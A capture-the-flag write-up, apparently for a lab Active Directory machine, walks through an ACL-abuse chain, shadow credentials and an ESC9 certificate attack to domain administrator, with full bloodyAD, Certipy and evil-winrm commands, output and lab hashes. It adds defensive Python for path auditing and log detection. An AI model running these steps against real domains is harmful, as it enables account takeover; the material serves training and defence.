This article shows how, starting from the judith.mader user, information gathering and vulnerability analysis lead to privilege escalation and root access. First, an Nmap scan of the target identifies the open ports and services. Next, bloodhound-python collects domain information, and a chain of ACL abuses adds judith.mader to the Management group to gain further rights. Finally, a certificate is requested through Certipy and used to authenticate as administrator, obtaining root. Each step's commands and their output are recorded, showing how penetration testing and privilege escalation are carried out in a Windows environment.
Information Gathering
# Nmap 7.98 scan initiated Fri Jan 2 03:47:32 2026 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.41
Nmap scan report for 10.10.11.41
Host is up (0.14s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: NOTIMP)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-02 10:17:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after: 2105-05-23T21:04:20
| MD5: 3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1: c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
|_ssl-date: 2026-01-02T10:18:55+00:00; +6h29m39s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-02T10:18:56+00:00; +6h29m39s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after: 2105-05-23T21:04:20
| MD5: 3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1: c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-02T10:18:55+00:00; +6h29m39s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after: 2105-05-23T21:04:20
| MD5: 3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1: c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after: 2105-05-23T21:04:20
| MD5: 3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1: c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
|_ssl-date: 2026-01-02T10:18:56+00:00; +6h29m39s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=1/2%Time=69573FE9%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-01-02T10:18:15
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 6h29m38s, deviation: 0s, median: 6h29m38s
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 2 03:49:17 2026 -- 1 IP address (1 host up) scanned in 105.83 seconds
Vulnerability Analysis
Provided credentials: judith.mader:judith09
First, synchronise the local clock with the DC (the scan reported a clock skew of about 6h29m, which would break Kerberos authentication):
➜ Certified sudo date -s "$(nmap -p 445 10.10.11.41 --script smb2-time | grep 'date: 2'|cut -d ' ' -f 5)"
Fri Jan 2 10:29:36 AM UTC 2026
# Collect domain information
bloodhound-python -d certified.htb -u judith.mader -p 'judith09' -dc 'dc01.certified.htb' -c all -ns 10.10.11.41 --zip

BloodHound shows the following ACL chain:
judith.mader (user) --WriteOwner--> Management (group) --GenericWrite--> Management_SVC (user) --GenericAll--> CA_OPERATOR (user)
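The chain above is exactly the kind of question a defender should be able to ask of collector output in bulk: which principals have a control path to a sensitive account? The following is an added example, not code from the writeup or from BloodHound; the edge list is constructed by hand to mirror the chain above (plus two filler edges), and the set of edge kinds treated as "control" is an assumption of the example.

```python
"""Added example (not from the original writeup): audit BloodHound-style
ACL edges for control paths.  The edges below are constructed by hand to
mirror the chain the writeup found; they are not real collector output."""
from collections import deque

# Edge kinds worth traversing: each either grants control over the target
# object or (MemberOf) inherits the target group's rights.  GenericRead is
# deliberately excluded: it discloses, but does not control.
TRAVERSABLE_EDGES = {"Owns", "WriteOwner", "WriteDacl", "GenericWrite",
                     "GenericAll", "AddMember", "AddKeyCredentialLink", "MemberOf"}

# Constructed edge list: (source principal, edge kind, target principal).
EDGES = [
    ("JUDITH.MADER@CERTIFIED.HTB",   "WriteOwner",   "MANAGEMENT@CERTIFIED.HTB"),
    ("MANAGEMENT@CERTIFIED.HTB",     "GenericWrite", "MANAGEMENT_SVC@CERTIFIED.HTB"),
    ("MANAGEMENT_SVC@CERTIFIED.HTB", "GenericAll",   "CA_OPERATOR@CERTIFIED.HTB"),
    ("JUDITH.MADER@CERTIFIED.HTB",   "MemberOf",     "DOMAIN USERS@CERTIFIED.HTB"),
    ("DOMAIN USERS@CERTIFIED.HTB",   "GenericRead",  "CA_OPERATOR@CERTIFIED.HTB"),
]


def build_graph(edges):
    """Adjacency list containing only traversable (control-granting) edges."""
    graph = {}
    for src, kind, dst in edges:
        if kind in TRAVERSABLE_EDGES:
            graph.setdefault(src, []).append((kind, dst))
    return graph


def find_path(edges, start, target):
    """Breadth-first search: shortest chain of control edges from start to target.
    Returns a list of (src, kind, dst) tuples, or None if no path exists."""
    graph = build_graph(edges)
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node == target:
            return path
        for kind, nxt in graph.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [(node, kind, nxt)]))
    return None


def principals_reaching(edges, target):
    """Defender view: every principal that has some control path to target."""
    nodes = {src for src, _, _ in edges} | {dst for _, _, dst in edges}
    return sorted(p for p in nodes if p != target and find_path(edges, p, target))


def render(path):
    """Format a path the way the writeup summarises it."""
    if not path:
        return "no path"
    parts = [path[0][0]]
    for _, kind, dst in path:
        parts.append(f"--{kind}--> {dst}")
    return " ".join(parts)


if __name__ == "__main__":
    p = find_path(EDGES, "JUDITH.MADER@CERTIFIED.HTB", "CA_OPERATOR@CERTIFIED.HTB")
    print(render(p))
    print("Principals with a control path to CA_OPERATOR:",
          principals_reaching(EDGES, "CA_OPERATOR@CERTIFIED.HTB"))
```

Run it directly and it prints the three-hop chain; `principals_reaching` is the audit query, and any low-privilege account it lists is a candidate for ACL clean-up (remove the WriteOwner/GenericWrite ACE, or move the sensitive account under a protected OU).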
Exploitation (User Flag)
# Change the owner of the management group to judith.mader
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' set owner 'management' judith.mader
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on management
# Grant judith.mader GenericAll on the group
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add genericAll 'management' judith.mader
[+] judith.mader has now GenericAll on management
# Add judith.mader to the group
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add groupMember 'management' judith.mader
[+] judith.mader added to management
# Use the ldap module to confirm judith.mader's group membership
nxc ldap 10.10.11.41 -u judith.mader -p 'judith09' --query "(sAMAccountName=judith.mader)" "memberOf"
Now that judith.mader is a member of Management, the group's GenericWrite over the Management_SVC user can be used:
# Add shadow credentials (write msDS-KeyCredentialLink) on the Management_SVC account
➜ Certified bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add shadowCredentials 'management_svc'
[+] KeyCredential generated with following sha256 of RSA key: 27e6dac6b3bf03d0ae9997665206b05b54de55bd629b95d8acd1f3e090c4248f
[+] TGT stored in ccache file management_svc_Df.ccache
NT: a091c1832bcdd4677c28b5a6a1295584
Privilege Escalation (Root Flag)
➜ Certified certipy find -u ca_operator@certified.htb -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -vulnerable -stdout
Certipy reports ESC9.
Change CA_OPERATOR's UPN to administrator, using the Management_SVC hash obtained above:
➜ Certified certipy account -u 'management_svc' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.10.11.41 -upn 'administrator' -user 'ca_operator' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : administrator
[*] Successfully updated 'ca_operator'
Request a certificate as CA_OPERATOR:
➜ Certified certipy req -u CA_OPERATOR -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -dc-ip 10.10.11.41 -ca 'certified-DC01-CA' -template 'CertifiedAuthentication' -debug
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
Restore the original UPN:
➜ Certified certipy account -u 'management_svc' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.10.11.41 -upn 'CA_OPERATOR@certified.htb' -user 'CA_OPERATOR' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : CA_OPERATOR@certified.htb
[*] Successfully updated 'ca_operator'
Authenticate with the certificate:
➜ Certified certipy auth -dc-ip '10.10.11.41' -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
➜ Certified evil-winrm -u administrator -H 0d5b49608bbce1751f708748f67e2d34 -i certified.htb
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
25313f415eb17c6f9856e10e820d9769
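Both of the steps that turned group membership into a domain compromise leave a distinctive trail in the Security log: a msDS-KeyCredentialLink write by a principal other than the account itself (the shadow-credentials step on Management_SVC), and a UPN change on one account, a certificate issuance to that account, and the UPN being changed back (the ESC9 step on CA_OPERATOR). The following is an added example, not code from the writeup or from Certipy; it runs simple detection logic over a constructed, simplified event stream. The dict layout, the field names (`subject`, `object_cn`, `attr`, `target`, `upn`, `requester`, `template`), the extra accounts (`alice`, `bob`, `helpdesk`) and the 600-second window are assumptions of the example; real events 5136, 4738 and 4887 carry the corresponding data in their EventData XML.

```python
"""Added example (not from the original writeup): detection logic for the
shadow-credentials write and the ESC9 UPN swap, run over a constructed,
simplified event stream.  Event IDs: 5136 = directory object modified,
4738 = user account changed, 4887 = AD CS issued a certificate.  Field
names and the dict layout are a simplification for the example."""

# Constructed events; 'time' is seconds since an arbitrary epoch.
EVENTS = [
    {"time": 100, "id": 5136, "subject": "judith.mader",
     "object_cn": "Management", "attr": "nTSecurityDescriptor"},
    {"time": 130, "id": 5136, "subject": "judith.mader",
     "object_cn": "management_svc", "attr": "msDS-KeyCredentialLink"},
    {"time": 140, "id": 5136, "subject": "alice",            # constructed: self-enrolment
     "object_cn": "alice", "attr": "msDS-KeyCredentialLink"},  # (e.g. Windows Hello) is benign
    {"time": 200, "id": 4738, "subject": "management_svc",
     "target": "ca_operator", "upn": "administrator"},
    {"time": 230, "id": 4887, "requester": "CERTIFIED\\ca_operator",
     "template": "CertifiedAuthentication"},
    {"time": 260, "id": 4738, "subject": "management_svc",
     "target": "ca_operator", "upn": "CA_OPERATOR@certified.htb"},
    {"time": 900, "id": 4738, "subject": "helpdesk",         # constructed: routine
     "target": "bob", "upn": "bob@certified.htb"},            # change, no cert follows
]

DOMAIN_SUFFIX = "@certified.htb"


def _sam(principal):
    """'CERTIFIED\\ca_operator' -> 'ca_operator'."""
    return principal.split("\\")[-1].lower()


def detect_keycredential_writes(events):
    """Flag msDS-KeyCredentialLink writes made by a principal other than the
    account itself: that is the shadow-credentials pattern.  Returns a list
    of (writer, victim) pairs."""
    hits = []
    for e in events:
        if e["id"] == 5136 and e["attr"] == "msDS-KeyCredentialLink":
            if _sam(e["subject"]) != e["object_cn"].lower():
                hits.append((e["subject"], e["object_cn"]))
    return hits


def detect_upn_swap(events, window=600):
    """ESC9-style pattern: an account's UPN is set to a value that is not its
    own (simplified heuristic: anything other than <sam>@<domain>), a
    certificate is issued to that account within `window` seconds, and the
    UPN is changed again afterwards.  Returns one finding per swap."""
    events = sorted(events, key=lambda e: e["time"])
    findings = []
    for i, e in enumerate(events):
        if e["id"] != 4738 or "upn" not in e:
            continue
        target = e["target"].lower()
        upn = e["upn"].lower()
        if upn == target + DOMAIN_SUFFIX:
            continue  # UPN matches the account's own identity: not a swap
        later = [x for x in events[i + 1:] if x["time"] - e["time"] <= window]
        cert = next((c for c in later
                     if c["id"] == 4887 and _sam(c["requester"]) == target), None)
        if cert is None:
            continue  # UPN change without a certificate request: leave for review, not an alert
        restore = next((r for r in later
                        if r["id"] == 4738 and r["target"].lower() == target
                        and r.get("upn", "").lower() != upn), None)
        findings.append({"target": target, "impersonated_upn": e["upn"],
                         "changed_by": e["subject"], "template": cert["template"],
                         "restored": restore is not None})
    return findings


if __name__ == "__main__":
    for writer, victim in detect_keycredential_writes(EVENTS):
        print(f"[!] shadow credentials: {writer} wrote msDS-KeyCredentialLink on {victim}")
    for f in detect_upn_swap(EVENTS):
        print(f"[!] ESC9 UPN swap on {f['target']} by {f['changed_by']}: "
              f"UPN set to {f['impersonated_upn']!r}, cert from {f['template']}, "
              f"restored={f['restored']}")
```

The UPN-swap rule deliberately requires the certificate issuance to fire, so routine UPN changes by helpdesk staff (the `bob` event) stay quiet; the "restored" flag is what separates a clumsy admin from the pattern above, where the change is undone once the certificate is in hand. On the prevention side, enabling strong certificate mapping (so that issued certificates carry the SID extension and are not mapped on UPN alone) removes the ESC9 condition, and auditing who holds write rights to msDS-KeyCredentialLink removes the shadow-credentials step.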